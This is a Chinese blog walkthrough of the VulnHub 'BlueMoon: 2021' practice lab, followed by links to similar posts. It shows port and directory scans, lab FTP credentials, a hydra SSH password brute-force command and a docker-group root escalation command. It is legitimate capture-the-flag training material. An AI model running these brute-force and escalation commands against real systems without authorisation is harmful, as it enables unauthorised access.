Vulnhub: BlueMoon: 2021靶机

最新推荐文章于 2024-09-28 22:34:31 发布

ctostm

最新推荐文章于 2024-09-28 22:34:31 发布

阅读量160

点赞数

文章标签：安全 web安全网络安全

本文链接：https://blog.csdn.net/qq_43884092/article/details/132080751

版权

kali：192.168.111.111

靶机：192.168.111.174

信息收集

端口扫描

nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.111.174

80端口目录爆破，发现文件：hidden_text

gobuster dir -u http://192.168.111.174 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt

访问后发现二维码

扫二维码后得到ftp用户名：userftp，密码：ftpp@ssword

在ftp的文件中提示用户名和密码字典

利用提示的用户和密码字典爆破ssh

hydra -l robin -P ./p_lists.txt 192.168.111.174 -s 22 ssh -t 64

提权

robin用户sudo权限

/home/robin/project/feedback.sh文件内容

运行该脚本后切换到用户jerry

sudo -u jerry /home/robin/project/feedback.sh

可以发现jerry处于docker组，提权方法：https://gtfobins.github.io/gtfobins/docker/#shell

提升为root

docker run -v /:/mnt --rm -it alpine chroot /mnt sh

flag

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

ctostm

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

VulnHub-BLUEMOON: 2021靶机

NeverForgetCX的博客

03-29

5098

前言：时隔二十多天我又来了，到vulnhub上随便下了个靶机进行打靶试试。 kali：192.168.22.140 靶机IP：192.168.22.144 信息收集：扫描靶机IP： arp-scan -l 获得靶机ip：扫描靶机开放的端口和服务： nmap -A -p 1-65535 192.168.22.144 看见开放的端口是21,22,...

VulnHub：BlueMoon

Aukum的博客

08-14

1000

VulnHub——BlueMoon: 2021，一个easy难度的新手靶机。知识点涉及：信息收集，hydra爆破，sudo提权，docker提权。

参与评论您还未登录，请先登录后发表或查看评论

看完这篇教你玩转渗透测试靶机Vulnhub——Bluemoon: 2021

Aluxian_的博客

10-26

722

vulnhub是个提供各种漏洞平台的综合靶场，可供下载多种虚拟机进行下载，本地VMware或者Oracle VM打开即可，像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。PS:需要获得root权限找到flagEasy （简单的）1.信息收集工具得使用2.提权命令的使用3.FTP下载、hydra爆破、SSH登入渗透的流程思路🆗又是收获满满的一天最后创作不易，希望对大家有所帮助喜欢的话麻烦大家给个一键三连你的开心就是我最大的快乐！！

vulnhub靶机bluemoon

m0_73248913的博客

01-23

422

vulnhub靶机

BLUEMOON: 2021

wanguixiu的博客

06-11

566

BLUEMOON: 2021 作者: admin 时间: 2021-06-10 分类: vulnhub靶场 fping -g 192.168.137.1/24 # step1 扫主机，找到靶场131 nmap -A -p 1-65535 -v 192.168.137.131 # step2 扫端口，扫到21，22，80 dirb http:/...

bluemoon_2021靶机详解

weixin_44681307的博客

07-18

189

我做这个靶场时候其实提权遇到了很多问题，最后没想到是shell的原因，后来重新建立了个shell就提权成功了，很简单的一个靶场。并且我们发现jerry用户是运行着一个docker的，因为以前见到过docker提权，所以就找了一条docker提权的命令。点击Thank You …cd到feedback.sh所在的文件，查看一下这个.sh文件，最后一行是我自己加的，请忽略。靶机的主页面并没有太多东西，但是这个图片里面是隐写了东西的，这里是个误导，我还研究了半天。然后我又扫描了一下目录，发现有一个奇怪的目录。

从Docker挂载逃逸原理复现分析到BlueMoon实战

蚁景网安学院

04-26

489

Docker 是一个开源的应用容器引擎，让开发者可以打包他们的应用以及依赖包到一个可移植的镜像中，然后发布到任何流行的 Linux或Windows操作系统的机器上，也可以实现虚拟化。容器是完全使用沙箱机制，相互之间不会有任何接口。

BlueMoon靶机(从安装到通关)一文章搞定

tlp_zzm的博客

10-24

238

我们可以将 /bin/bash 赋值给 feedback 这个变量，这样我们就能得到 jerry 的 shell 了。也就是说 feedback 这个变量是我们可控的，如果feedback赋值/bin/bash将得到一个类似shell窗口。在 docker 组中，这样我们就可以借用 docker，将靶机上的目录挂载到容器中，这样我们就能访问受限目录了。但是这个文章里面用vim编辑,一般来说靶机没有安装vim,我都是用vi编辑,或者大佬都用nano编辑。拿到flag,就可以撤了。但是不是最终的flag。

打靶记录4——靶机AdmX_new

Fab1an的博客

07-31

435

先对该靶机进行了主机发现和端口扫描，只发现了一个80端口，这是我们唯一的攻击方式浏览器访问发现只有一个Apache的页面，于是我们对目标的Web服务进行路径的爆破，发现了WordPress但是发现加载速度很慢，于是使用BurpSuite进行抓取和分析整个Web请求的所有流量，发现是在页面上通过硬编码的方式写死了一些IP地址，于是通过BurpSuite的匹配和替换，也就是Match And Replace这样的一个功能，将写死的IP地址替换成目标靶机的IP地址，从而可以比较流畅的打开Web页面。

Vulnhub靶机系列：De-ICE: S1.120

01-09

靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它，我的这篇文章有简单指导Vulnhub靶机系列：pWnOS: 2.0另外iso文件如何导入就不赘述了，安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。利用...

Vulnhub:Digitalworld.local (Development)靶机

qq_43884092的博客

04-09

565

访问development目录，提示存在一个流量包，查看流量包发现另一个网站路径：/developmentsecretpage/directortestpagev1.php，访问该路径后退出登录，再重新登录，用户名和密码随便填写，之后页面提示报错，根据报错搜索关键字

Vulnhub:SUNSET-DAWN靶机

logan_logan的博客

06-06

546

1.在浏览器中输入目标靶机IP地址，浏览网页 2.端口扫描发现开启了samba服务，接下来对samba服务进行枚举； nmap -p- 192.168.31.130 nmap -sC -sV -p 139,445,3306,12345 192.168.31.130 对samba服务枚举得时候发现了ITDEPT共享目录，不需要密码就可以登录 enum4linux -a -o 192.168.31.130 登录samba后，发现并没有文件存在，但是这个目录可以上传文件； smbclient

Vulnhub:WebDeveloper:1靶机

qq_43884092的博客

03-27

264

目录爆破发现ipdata目录,进入该目录发现一个流量包，下载使用wireshark打开,查看/var/www/html/wp-config.php获得数据库账号密码，同时该密码也是系统用户webdeveloper的密码

部标主动安全（ADAS+DMS）对接说明

谁念西风独自凉

09-27

773

上一篇介绍了，这里说一下如何对接主动安全附件服务器。流媒体的对接主要牵扯到4个方面：（1）平台端：业务端系统，包含前端呈现界面。（2）JT/T808网关：部标设备接入网关，这个是非常重要的，是设备与平台进行数据交换的桥梁，流媒体相关的指令操作也必须依赖它完成。（3）部标视频机：符合JT/T808协议的车载视频机器。（4）流媒体服务：符合苏标、粤标、川标、陕标协议的主动安全附件服务，接收文件流，并存储。

【蚂蚁HR-注册/登录安全分析报告】

最新发布

09-28

1208

蚂蚁社保是武汉微蚁企业服务有限公司旗下的网站，主要提供五险一金的代缴、补缴、社保开户、社保挂靠和社保代理服务。该平台主要覆盖一二线城市，目前已覆盖13+城市。蚂蚁社保的特点是高度自动化和在线化，创始人团队致力于通过程序和硬件替代所有可以自动化的环节，从而最大限度地减少人为错误，作为头部的社保代缴平台，技术实力也应该不错，但采用的还是老一代的图形验证码已经落伍了，用户体验一般，容易被破解，一旦被国际黑客发起攻击，将会对老百姓形成骚扰，影响声誉。

Splashtop 加入 Microsoft 智能安全协会

SplashtopLoki的博客

09-27

752

Splashtop 的 Foxpass Cloud RADIUS 可提供精确的访问控制，保护 Wi-Fi 网络免受未授权用户和网络攻击的侵害，Foxpass 因其流畅的用户体验和强大的安全性而广受认可。MISA 由独立软件供应商（ISV）和托管安全服务提供商（MISA）组成，他们将其解决方案与 Microsoft 安全技术集成，以更好地保护我们共同的客户免受日益增长的网络威胁。MISA 的使命是提供行业领先的智能安全解决方案，在安全威胁不断增加的情况下，以 AI 的速度和规模保护组织安全。

Spring Security 是一个强大的和高度可定制的身份验证和访问控制框架。它是 Spring 项目家族的一员，用于构建安全的 Java 应用程序。

weixin_64446270的博客

09-27

1456

Spring Security 是一个强大的和高度可定制的身份验证和访问控制框架。它是 Spring 项目家族的一员，用于构建安全的 Java 应用程序。Spring Security 提供了全面的安全服务，从基本的登录认证到复杂的访问控制，几乎涵盖了所有与安全相关的需求。

安全服务面试

m0_74402888的博客

09-28

640

内网的计算机可向 Internet 上的其他计算机发送连接请求，但 Internet 上其他。个列表中的 IP 进行 SYN+ACK 的重试。明白这种攻击的基本原理，还是要从 TCP 连接建立的过程开始说起：大家都知道，TCP 与。的 IP 地址，如果攻击者以数万/秒的速度发送 SYN 报文，同时利用 SOCK_RAW。Internet 上的计算机，但 Internet 上的计算机无法访问局域网内的计算机。内网的计算机以 NAT（网络地址转换）协议，通过一个公共的网关访问 Internet。

vulnhub靶机系列：

09-09

关于Vulnhub靶机系列，我可以提供一些信息。Vulnhub是一个开放的漏洞测试平台，提供了一系列用于学习和实践渗透测试的虚拟机。这些虚拟机包含了各种不同的漏洞，供安全爱好者和专业人员练习渗透测试技巧。 Vulnhub...